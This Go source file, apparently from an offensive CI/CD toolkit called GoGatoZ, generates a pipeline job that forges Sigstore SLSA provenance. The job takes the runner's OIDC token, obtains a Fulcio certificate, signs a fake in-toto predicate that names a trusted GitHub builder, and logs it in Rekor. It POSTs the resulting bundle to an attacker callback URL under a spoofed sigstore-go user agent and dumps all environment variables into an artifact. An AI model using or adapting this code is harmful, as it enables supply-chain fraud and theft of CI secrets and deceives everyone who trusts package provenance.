package payloads

import (
	"fmt"
	"strings"
)

// SigstoreOptions configures a Sigstore provenance generation payload.
// This replicates supply chain attacks that forge SLSA provenance attestations
// by generating fraudulent Sigstore bundles (Fulcio certificates + Rekor
// transparency log entries) using CI-provided OIDC tokens. A forged SLSA v1
// in-toto predicate wrapped in a DSSE envelope creates a verifiable-looking
// supply chain attestation for a package that was never legitimately built.
//
// Attack flow:
// 1. Generate an ECDSA P-256 ephemeral signing keypair
// 2. Obtain an OIDC identity token from the CI environment
// 3. Request a short-lived signing certificate from Fulcio
// 4. Build an in-toto/SLSA v1 predicate JSON
// 5. Sign a DSSE envelope over the predicate
// 6. Submit the signed entry to the Rekor transparency log
// 7. Assemble a sigstore bundle v0.3 JSON
// 8. Exfiltrate the bundle or save as a CI artifact
type SigstoreOptions struct {
	Common      CommonOptions
	PackageName string // package name for the attestation subject
	Version     string // package version
	RegistryURL string // registry URL (default: "https://registry.npmjs.org")
	CallbackURL string // HTTP endpoint to POST the forged bundle
}

// GenerateSigstoreYAML returns a CI job that forges Sigstore provenance attestations.
func GenerateSigstoreYAML(o SigstoreOptions) string {
	name, stage := o.Common.defaults("sigstore-forge")
	script := buildSigstoreScript(o)
	img := o.Common.Image
	if strings.TrimSpace(img) == "" {
		img = "node:lts-alpine"
	}
	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Sigstore Provenance Forgery)
# Forges SLSA v1 attestations with Fulcio + Rekor via CI OIDC tokens
stages: [%s]

%s:
  stage: %s
  image: %s%s
  script:
    - |
%s
    - printenv | sort > env.txt || true
  artifacts:
    paths:
      - env.txt
      - sigstore_results/
    when: always
  allow_failure: true%s
`, stage, name, stage, img, tagsLine(o.Common.Tags), indentBlock(script, 6), rulesManual(o.Common.Manual))
}

// indentBlock prefixes every non-empty line of s with n spaces.
func indentBlock(s string, n int) string {
	prefix := strings.Repeat(" ", n)
	lines := strings.Split(s, "\n")
	for i, line := range lines {
		if line != "" {
			lines[i] = prefix + line
		}
	}
	return strings.Join(lines, "\n")
}

func buildSigstoreScript(o SigstoreOptions) string {
	var b strings.Builder

	pkgName := strings.TrimSpace(o.PackageName)
	if pkgName == "" {
		pkgName = "target-package"
	}
	version := strings.TrimSpace(o.Version)
	if version == "" {
		version = "1.0.0"
	}
	registryURL := strings.TrimSpace(o.RegistryURL)
	if registryURL == "" {
		registryURL = "https://registry.npmjs.org"
	}
	callbackURL := strings.TrimSpace(o.CallbackURL)
	if callbackURL == "" {
		callbackURL = "https://example.invalid/callback"
	}

	b.WriteString("_SIGSTORE_FORGE() {\n")
	b.WriteString("  _sdir=$(mktemp -d)\n")
	b.WriteString("  echo \"[*] Sigstore provenance forgery starting...\"\n\n")

	// Step 1: Generate ECDSA P-256 ephemeral keypair
	b.WriteString("  # Step 1: Generate ECDSA P-256 ephemeral keypair\n")
	b.WriteString("  echo \"[*] Generating ECDSA P-256 keypair...\"\n")
	b.WriteString("  openssl ecparam -genkey -name prime256v1 -noout -out \"$_sdir/ec_private.pem\" 2>/dev/null\n")
	b.WriteString("  openssl ec -in \"$_sdir/ec_private.pem\" -pubout -out \"$_sdir/ec_public.pem\" 2>/dev/null\n")
	b.WriteString("  echo \"[+] Keypair generated\"\n\n")

	// Step 2: Obtain OIDC identity token
	b.WriteString("  # Step 2: Obtain OIDC identity token from CI environment\n")
	b.WriteString("  echo \"[*] Requesting OIDC token...\"\n")
	b.WriteString("  _oidc_token=\"\"\n")
	b.WriteString("  if [ -n \"$ACTIONS_ID_TOKEN_REQUEST_URL\" ] && [ -n \"$ACTIONS_ID_TOKEN_REQUEST_TOKEN\" ]; then\n")
	b.WriteString("    _oidc_token=$(curl -sS -H \"Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN\" \\\n")
	b.WriteString("      -H \"Accept: application/json\" \\\n")
	b.WriteString("      \"${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=sigstore\" 2>/dev/null | \\\n")
	b.WriteString("      sed -n 's/.*\"value\":\"\\([^\"]*\\)\".*/\\1/p')\n")
	b.WriteString("    echo \"[+] GitHub Actions OIDC token obtained\"\n")
	b.WriteString("  elif [ -n \"$CI_JOB_JWT\" ]; then\n")
	b.WriteString("    _oidc_token=\"$CI_JOB_JWT\"\n")
	b.WriteString("    echo \"[+] GitLab CI OIDC token obtained (CI_JOB_JWT)\"\n")
	b.WriteString("  else\n")
	b.WriteString("    echo \"[-] No OIDC token source found, using placeholder\"\n")
	b.WriteString("    _oidc_token=\"eyJhbGciOiJSUzI1NiJ9.placeholder.sig\"\n")
	b.WriteString("  fi\n\n")

	// Step 3: Request signing certificate from Fulcio
	b.WriteString("  # Step 3: Request signing certificate from Fulcio\n")
	b.WriteString("  echo \"[*] Requesting Fulcio signing certificate...\"\n")
	b.WriteString("  _pub_b64=$(openssl ec -in \"$_sdir/ec_private.pem\" -pubout -outform DER 2>/dev/null | base64 -w0)\n")
	b.WriteString("  _pop=$(echo -n \"$_oidc_token\" | openssl dgst -sha256 -sign \"$_sdir/ec_private.pem\" 2>/dev/null | base64 -w0)\n")
	b.WriteString("  printf '{\"credentials\":{\"oidcIdentityToken\":\"%s\"},\"publicKeyRequest\":{\"publicKey\":{\"algorithm\":\"ECDSA\",\"content\":\"%s\"},\"proofOfPossession\":\"%s\"}}' \\\n")
	b.WriteString("    \"$_oidc_token\" \"$_pub_b64\" \"$_pop\" > \"$_sdir/fulcio_req.json\"\n")
	b.WriteString("  _fulcio_resp=$(curl -sS -X POST \\\n")
	b.WriteString("    -H \"Content-Type: application/json\" \\\n")
	b.WriteString("    -d @\"$_sdir/fulcio_req.json\" \\\n")
	b.WriteString("    \"https://fulcio.sigstore.dev/api/v2/signingCert\" 2>/dev/null)\n")
	b.WriteString("  echo \"$_fulcio_resp\" > \"$_sdir/fulcio_cert.json\"\n")
	b.WriteString("  echo \"[+] Fulcio certificate response saved\"\n\n")

	// Step 4: Build in-toto/SLSA v1 predicate (printf — no heredocs)
	b.WriteString("  # Step 4: Build in-toto/SLSA v1 predicate\n")
	b.WriteString("  echo \"[*] Building SLSA v1 predicate...\"\n")
	fmt.Fprintf(&b, "  _pkg_digest=$(echo -n \"%s@%s\" | sha256sum | cut -d' ' -f1)\n", pkgName, version)
	b.WriteString("  _started=$(date -u +%%Y-%%m-%%dT%%H:%%M:%%SZ)\n")
	b.WriteString("  _invocation=\"${CI_PIPELINE_ID:-unknown}\"\n")
	fmt.Fprintf(&b, "  printf '{\"_type\":\"https://in-toto.io/Statement/v1\",\"subject\":[{\"name\":\"%s\",\"digest\":{\"sha256\":\"%%s\"}}],\"predicateType\":\"https://slsa.dev/provenance/v1\",\"predicate\":{\"buildDefinition\":{\"buildType\":\"https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1\",\"externalParameters\":{\"source\":\"%s/%s\",\"version\":\"%s\"},\"resolvedDependencies\":[]},\"runDetails\":{\"builder\":{\"id\":\"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.9.0\"},\"metadata\":{\"invocationId\":\"%%s\",\"startedOn\":\"%%s\"}}}}' \\\n", pkgName, registryURL, pkgName, version)
	b.WriteString("    \"$_pkg_digest\" \"$_invocation\" \"$_started\" > \"$_sdir/predicate.json\"\n")
	b.WriteString("  echo \"[+] SLSA v1 predicate built\"\n\n")

	// Step 5: Sign DSSE envelope (printf — no heredocs)
	b.WriteString("  # Step 5: Sign DSSE envelope\n")
	b.WriteString("  echo \"[*] Signing DSSE envelope...\"\n")
	b.WriteString("  _payload_b64=$(base64 -w0 \"$_sdir/predicate.json\")\n")
	b.WriteString("  _pae_header=\"DSSEv1 28 application/vnd.in-toto+json\"\n")
	b.WriteString("  _pae_len=${#_payload_b64}\n")
	b.WriteString("  printf '%s %s %s' \"$_pae_header\" \"$_pae_len\" \"$_payload_b64\" > \"$_sdir/pae.bin\"\n")
	b.WriteString("  _sig=$(openssl dgst -sha256 -sign \"$_sdir/ec_private.pem\" \"$_sdir/pae.bin\" 2>/dev/null | base64 -w0)\n")
	b.WriteString("  printf '{\"payloadType\":\"application/vnd.in-toto+json\",\"payload\":\"%s\",\"signatures\":[{\"keyid\":\"\",\"sig\":\"%s\"}]}' \\\n")
	b.WriteString("    \"$_payload_b64\" \"$_sig\" > \"$_sdir/dsse_envelope.json\"\n")
	b.WriteString("  echo \"[+] DSSE envelope signed\"\n\n")

	// Step 6: Submit to Rekor transparency log (printf — no heredocs)
	b.WriteString("  # Step 6: Submit to Rekor transparency log\n")
	b.WriteString("  echo \"[*] Submitting to Rekor...\"\n")
	b.WriteString("  _envelope_b64=$(base64 -w0 \"$_sdir/dsse_envelope.json\")\n")
	b.WriteString("  printf '{\"apiVersion\":\"0.0.2\",\"kind\":\"dsse\",\"spec\":{\"content\":{\"envelope\":\"%s\"}}}' \\\n")
	b.WriteString("    \"$_envelope_b64\" > \"$_sdir/rekor_req.json\"\n")
	b.WriteString("  _rekor_resp=$(curl -sS -X POST \\\n")
	b.WriteString("    -H \"Content-Type: application/json\" \\\n")
	b.WriteString("    -d @\"$_sdir/rekor_req.json\" \\\n")
	b.WriteString("    \"https://rekor.sigstore.dev/api/v1/log/entries\" 2>/dev/null)\n")
	b.WriteString("  echo \"$_rekor_resp\" > \"$_sdir/rekor_resp.json\"\n")
	b.WriteString("  echo \"[+] Rekor submission complete\"\n\n")

	// Step 7: Assemble sigstore bundle v0.3 (printf — no heredocs)
	b.WriteString("  # Step 7: Assemble sigstore bundle v0.3\n")
	b.WriteString("  echo \"[*] Assembling sigstore bundle...\"\n")
	b.WriteString("  _cert_raw=$(sed -n 's/.*\"rawBytes\":\"\\([^\"]*\\)\".*/\\1/p' \"$_sdir/fulcio_cert.json\" 2>/dev/null || echo 'none')\n")
	b.WriteString("  _log_idx=$(sed -n 's/.*\"logIndex\":\\([0-9]*\\).*/\\1/p' \"$_sdir/rekor_resp.json\" 2>/dev/null || echo '0')\n")
	b.WriteString("  _tree_id=$(sed -n 's/.*\"treeId\":\"\\([^\"]*\\)\".*/\\1/p' \"$_sdir/rekor_resp.json\" 2>/dev/null || echo 'unknown')\n")
	b.WriteString("  _int_time=$(date +%%s)\n")
	b.WriteString("  _set=$(sed -n 's/.*\"signedEntryTimestamp\":\"\\([^\"]*\\)\".*/\\1/p' \"$_sdir/rekor_resp.json\" 2>/dev/null || echo 'none')\n")
	b.WriteString("  _dsse_body=$(cat \"$_sdir/dsse_envelope.json\")\n")
	b.WriteString("  printf '{\"mediaType\":\"application/vnd.dev.sigstore.bundle.v0.3+json\",\"verificationMaterial\":{\"certificate\":{\"rawBytes\":\"%s\"},\"tlogEntries\":[{\"logIndex\":\"%s\",\"logId\":{\"keyId\":\"%s\"},\"integratedTime\":\"%s\",\"inclusionPromise\":{\"signedEntryTimestamp\":\"%s\"}}]},\"dsseEnvelope\":%s}' \\\n")
	b.WriteString("    \"$_cert_raw\" \"$_log_idx\" \"$_tree_id\" \"$_int_time\" \"$_set\" \"$_dsse_body\" > \"$_sdir/bundle.sigstore.json\"\n")
	b.WriteString("  echo \"[+] Sigstore bundle v0.3 assembled\"\n\n")

	// Step 8: Exfiltrate
	b.WriteString("  # Step 8: Exfiltrate forged bundle\n")
	b.WriteString("  echo \"[*] Exfiltrating sigstore bundle...\"\n")
	b.WriteString("  curl -sS -X POST \\\n")
	b.WriteString("    -H \"Content-Type: application/json\" \\\n")
	b.WriteString("    -H \"User-Agent: sigstore-go/0.6.0\" \\\n")
	b.WriteString("    -d @\"$_sdir/bundle.sigstore.json\" \\\n")
	fmt.Fprintf(&b, "    \"%s\" >/dev/null 2>&1 || true\n", callbackURL)
	b.WriteString("  echo \"[+] Bundle exfiltrated\"\n\n")

	// Cleanup
	b.WriteString("  rm -rf \"$_sdir\"\n")
	b.WriteString("  echo \"[*] Sigstore provenance forgery complete\"\n")
	b.WriteString("}\n\n_SIGSTORE_FORGE || true\n")

	return b.String()
}
